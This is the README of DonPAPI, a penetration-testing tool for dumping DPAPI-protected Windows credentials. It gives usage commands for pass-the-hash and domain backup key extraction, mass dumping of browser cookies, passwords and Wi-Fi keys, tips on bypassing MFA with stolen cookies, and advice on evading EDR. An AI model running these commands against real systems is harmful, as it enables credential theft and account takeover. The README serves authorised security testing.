DonPAPI/readme.md

293 lines
12 KiB
Markdown
Raw Normal View History

2021-09-27 09:20:43 +00:00
# DonPAPI
2022-10-16 15:47:33 +00:00
2021-09-27 09:20:43 +00:00
Dumping revelant information on compromised targets without AV detection
![alt text](./assets/Logo%20DonPapi.png)
2022-10-16 15:47:33 +00:00
2021-09-30 16:06:42 +00:00
Lots of credentials are protected by [DPAPI](https://docs.microsoft.com/en-us/dotnet/standard/security/how-to-use-data-protection).
2021-11-18 09:59:43 +00:00
We aim at locating those "secured" credentials, and retrieve them using :
2022-10-16 15:47:33 +00:00
2021-09-30 16:06:42 +00:00
- User password
- Domaine DPAPI BackupKey
- Local machine DPAPI Key (protecting `TaskScheduled` blob)
2021-09-27 09:20:43 +00:00
We made a talk in french about DPAPI called **DPAPI - Don't Put Administration Passwords In 🇫🇷**:
- [Slides](./assets/Login%20Se%CC%81curite%CC%81%20-%20DPAPI%20-%20Don't%20Put%20Administration%20Passwords%20In%20-%20LeHack%202023.pdf)
- Video - coming soon
## Table of Contents
- [DonPAPI](#donpapi)
- [Table of Contents](#table-of-contents)
- [Installation](#installation)
- [Helper](#helper)
- [Usage](#usage)
- [Currently Gathered Info](#curently-gathered-info)
- [Compliance check](#compliance-check)
- [Operational use](#operational-use)
- [Reports & Raw Data](#reports--raw-data)
- [Opsec consideration](#opsec-consideration)
- [Credits](#credits)
- [Todo](#todo)
2022-10-16 15:47:33 +00:00
## Installation
2021-09-27 09:20:43 +00:00
2023-07-29 08:58:39 +00:00
***This tool should be install with [pipx](https://pypi.org/project/pipx/) or in a dedicated virtual environment***
2023-07-29 09:03:26 +00:00
```bash
2023-07-29 08:58:39 +00:00
pipx install donpapi
DonPAPI
```
2022-10-16 15:47:33 +00:00
2023-07-29 09:03:26 +00:00
or (with latest commits)
2021-09-27 09:20:43 +00:00
2023-07-29 09:03:26 +00:00
```bash
pipx install git+https://github.com/login-securite/DonPAPI.git
```
2021-09-30 16:06:42 +00:00
2023-07-29 09:03:26 +00:00
or (to dev)
2022-10-16 15:47:33 +00:00
2023-07-29 09:03:26 +00:00
```bash
git clone git+https://github.com/login-securite/DonPAPI.git
cd DonPAPI
poetry update
poetry run DonPAPI
```
2021-09-30 16:06:42 +00:00
## Helper
2021-09-30 16:06:42 +00:00
```
$ DonPAPI
,
2023-07-29 08:58:39 +00:00
, LeHack Release! 💀
(
2023-07-29 08:58:39 +00:00
. by Touf & Zblurx @ Login Sécurité
&&&&&&
&&&&&%%%. &&&&&&
&&&&%%% &&&& &&&&&& &&&&&& &&&&&.
&&&&%%% &&&&&&& &&&&&& &&&&&&&&&&&&& &&&&&&&&&&&
&&&&%%% &&&&&&&&& &&&&&& &&&&&&&&&&&&&&&& &&&&&&&&&&&&&
&&&&&&%%%%% &&&&&& &&&&&& &&&&&& &&&&&& &&&&& &&&&& #####
&&&&&&&&&%%%%%%% &&&&&&&&&&&&&&&& (&&&&&&&&&&&&&&& &&&&& &&&&& # # #
&/&/////////////% &&&&&&&&&&&& &&&&&&&&&&&& &&&&& &&&&& #####
&&/&/#////////(//% &&&&&& &&&&&& &&&&& &&&&& ###
&&/&/////////////%
&&/&/////////////% &&&&&&&&& &&&&&&&&&& &&&&&&&&& &&&&&
&&/&//////////(//% &&&&&&&&&&&&&& &&&&&&&&&&&&&& &&&&&&&&&&&&&& &&&&&
&&/&/////////////% &&&&&& &&&&&& &&&&&& &&&&&&& &&&&&& &&&&&& &&&&&
&&/&///////////(/% &&&&&& &&&&&& &&&&&& &&&&&& &&&&&& &&&&&& &&&&&
&&/&///(/////////% &&&&&& &&&&&&&&& &&&&&&&&& &&&&&& &&&&&& &&&&&&&&& &&&&&
&&/&/////////////% &&&&&& &&&&&&& &&&&&&& &&&&&& &&&&&& &&&&&&& &&&&&
&&#&###########/#% &&&&&& &&&&&&
&&###############% &&&&&& &&&&&&
usage: DonPAPI [-h] [-credz CREDZ] [-pvk PVK] [-d] [-t number of threads] [-o OUTPUT_DIRECTORY] [-H LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-local_auth] [-laps] [-dc-ip ip address]
[-target-ip ip address] [-port [destination port]] [-R] [--type TYPE] [-u] [--target] [--no_browser] [--no_dpapi] [--no_vnc] [--no_remoteops] [--GetHashes] [--no_recent] [--no_sysadmins]
[--from_file FROM_FILE]
[target]
SeatBelt implementation.
positional arguments:
target [[domain/]username[:password]@]<targetName or address>
optional arguments:
-h, --help show this help message and exit
-credz CREDZ File containing multiple user:password or user:hash for masterkeys decryption
-pvk PVK input backupkey pvk file
-d, --debug Turn DEBUG output ON
-t number of threads number of threads
-o OUTPUT_DIRECTORY, --output_directory OUTPUT_DIRECTORY
output log directory
authentication:
-H LMHASH:NTHASH, --hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the
command line
-aesKey hex key AES key to use for Kerberos Authentication (1128 or 256 bits)
-local_auth use local authentification
-laps use LAPS to request local admin password
connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it
-port [destination port]
Destination port to connect to SMB Server
Reporting:
-R, --report Only Generate Report on the scope
--type TYPE only report "type" password (wifi,credential-blob,browser-internet_explorer,LSA,SAM,taskscheduler,VNC,browser-chrome,browser-firefox
-u, --user only this username
--target only this target (url/IP...)
attacks:
--no_browser do not hunt for browser passwords
--no_dpapi do not hunt for DPAPI secrets
--no_vnc do not hunt for VNC passwords
--no_remoteops do not hunt for SAM and LSA with remoteops
--GetHashes Get all users Masterkey's hash & DCC2 hash
--no_recent Do not hunt for recent files
--no_sysadmins Do not hunt for sysadmins stuff (mRemoteNG, vnc, keepass, lastpass ...)
--from_file FROM_FILE
Give me the export of ADSyncQuery.exe ADSync.mdf to decrypt ADConnect password
```
2021-09-27 09:20:43 +00:00
## Usage
Dump all secrets of the target machine with an Domain admin account :
2021-09-27 09:20:43 +00:00
2021-09-30 16:06:42 +00:00
```bash
DonPAPI domain/user:passw0rd@target
2021-09-30 16:06:42 +00:00
```
or a Local one :
```
DonPAPI -local_auth user@target
```
Using PtH
2021-09-27 09:20:43 +00:00
2021-09-30 16:06:42 +00:00
```bash
DonPAPI --hashes <LM>:<NT> domain/user@target
2021-09-30 16:06:42 +00:00
```
2021-09-27 09:20:43 +00:00
Using kerberos (-k)
2021-09-27 09:20:43 +00:00
2021-09-30 16:06:42 +00:00
```bash
DonPAPI -k domain/user@target
2021-09-30 16:06:42 +00:00
```
2021-09-27 09:20:43 +00:00
2021-09-30 16:06:42 +00:00
Using a user with LAPS password reading rights
2021-09-27 09:20:43 +00:00
2021-09-30 16:06:42 +00:00
```bash
DonPAPI -laps domain/user:passw0rd@target
2021-09-30 16:06:42 +00:00
```
2021-09-27 09:20:43 +00:00
Using relayed socks:
![HackndoRealying](https://pbs.twimg.com/media/FAnPpHjX0AE16r9?format=jpg&name=medium)
To decrypt secrets DonPapi might need :
- Nothing, when facing reversible encryption (firefox, mremoteNG, VNC)
- the machine DPAPI Key, we will fetch it automatically thanks to secretdumps when having an admin acces (Wifi, scheduled task passwords)
- the user password for everything related to DPAPI Protection, or de DPAPI Domain Backup key
It is possible to provide a list of credentials that will be tested on the target. DonPAPI will try to use them to decipher masterkeys.
2021-09-27 09:20:43 +00:00
2021-09-30 16:06:42 +00:00
This credential file must have the following syntax:
```plain
user1:pass1
user1:pass2
user2:passX
2021-09-30 16:06:42 +00:00
...
```
```bash
DonPAPI -credz credz_file.txt domain/user:passw0rd@target
2021-09-30 16:06:42 +00:00
```
When a domain admin user is available, it is possible to dump the domain backup key using impacket `dpapi.py` tool:
2021-09-30 16:06:42 +00:00
```bash
2021-11-18 09:59:43 +00:00
dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip
2021-09-30 16:06:42 +00:00
```
2021-09-27 09:20:43 +00:00
Or with [dploot](https://github.com/zblurx/dploot):
```bash
dploot backupkeys -u username -p password -d domain 192.168.56.30
```
2021-11-18 09:59:43 +00:00
This backup key (pvk file) can then be used to dump all domain user's secrets!
2021-09-27 09:20:43 +00:00
```bash
DonPAPI -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list
```
2021-09-27 09:20:43 +00:00
**Target can be an IP, IP range, CIDR, FQDN, file containing list targets (one per line)**
2021-09-27 09:20:43 +00:00
### Curently gathered info
2021-09-27 09:20:43 +00:00
- Windows credentials (Taskscheduled credentials & a lot more)
- Windows Vaults
- Windows RDP credentials
- Windows certificates
- AdConnect (still require a manual operation)
- Wifi key
- Internet explorer Credentials
2023-12-11 10:11:09 +00:00
- Chrome cookies & credentials (and chrome like : Edge)
- Firefox cookies & credentials
- VNC passwords
- mRemoteNG password (with default config)
2023-12-11 10:11:09 +00:00
- putty, WinSCP
- Google Refresh Token
2022-10-16 15:47:33 +00:00
### Compliance check
2021-09-27 09:20:43 +00:00
- SMB signing status
- OS/Domain/Hostname/Ip of the audited scope
2022-10-16 15:47:33 +00:00
### Operational use
2021-09-27 09:20:43 +00:00
With local admin account on a host, we can :
2022-10-16 15:48:00 +00:00
- Gather machine protected DPAPI secrets
- ScheduledTask that will contain cleartext login/password of the account configured to run the task
- Wi-Fi passwords
- Extract Masterkey's hash value for every user profiles (masterkeys beeing protected by the user's password, let's try to crack them with Hashcat)
- Identify who is connected from where, in order to identify admin's personal computers.
- Extract other non-dpapi protected secrets (VNC/Firefox/mRemoteNG)
- Gather protected secrets from IE, Chrome, Firefox and start reaching the Azure tenant.
With a user password, or the domain PVK we can unprotect the user's DPAPI secrets.
- Use cookies to bypass MFA (https://www.eshlomo.us/pass-the-cookie-crumble-the-cloud/)
### Reports & Raw Data
DonPapi will extract and consolidate a bunch of raw information:
- raw user and passwords in 'raw_credz'
- dumped certificates informations
- raw cookies
- raw sam hash
- raw users masterkey's hash (Good luck with cracking those, but it might be the only hash you'll get for some SuperAdmin Accounts)
- raw DCC2
To generate the report, just use DonPAPI with `-R`.
HTML Reports will be created, as you'll probably have so many passwords that your browser will crash rendering it, i tried to separate those in few reports.
Cookies are great to bypass MFA, by clicking on a cookie in the report you'll copy what you need to paste to cookie in your browser dev console.
If the certificate allow client authentication, you can click on "Yes" to get a working `certipy auth` command with the certificate in your clipboard.
some info are excluded from the reports, you can still acces all the data in the sqlite3 donpapi.db database.
### Opsec consideration
The RemoteOps part can be spoted by some EDR (it's basically a secretdump). It can be disabled using `--no_remoteops` flag, but then the machine DPAPI key won't be retrieved, and scheduled task credentials/Wi-Fi passwords won't be harvested.
2022-10-16 15:48:00 +00:00
2021-09-30 16:06:42 +00:00
## Credits
2022-10-16 15:47:33 +00:00
All the credits goes to these great guys for doing the hard research & coding :
2021-09-30 16:06:42 +00:00
- Benjamin Delpy ([@gentilkiwi](https://twitter.com/gentilkiwi)) for most of the DPAPI research (always greatly commented, <3 your code)
- Alberto Solino ([@agsolino](https://twitter.com/agsolino)) for the tremendous work of Impacket (https://github.com/SecureAuthCorp/impacket). Almost everything we do here comes from impacket.
- [Alesandro Z](https://github.com/AlessandroZ) & everyone who worked on Lazagne (https://github.com/AlessandroZ/LaZagne/wiki) for the VNC & Firefox modules, and most likely for a lots of other ones in the futur.
- dirkjanm [@_dirkjan](https://twitter.com/_dirkjan) for the base code of adconnect dump (https://github.com/fox-it/adconnectdump) & every research he ever did. I learned so much on so many subjects thanks to you. <3
- [@byt3bl33d3r](https://twitter.com/byt3bl33d3r) for CME (lots of inspiration and code comes from CME : https://github.com/byt3bl33d3r/CrackMapExec )
- All the Team at [@LoginSecurite](https://twitter.com/LoginSecurite) for their help in debugging my shity code (special thanks to [@layno](https://github.com/clayno) & [@HackAndDo](https://twitter.com/HackAndDo) for that)
## Todo
2022-10-16 15:47:33 +00:00
2021-09-30 16:07:07 +00:00
- Finish ADSync/ADConnect password extraction
2021-09-27 09:20:43 +00:00
- CREDHISTORY full extraction
2021-09-30 16:06:42 +00:00
- Further analysis ADAL/msteams
2021-09-30 16:07:07 +00:00
- Implement Chrome <v80 decoder
- Find a way to implement Lazagne's great module
- Implement ADCS PKI export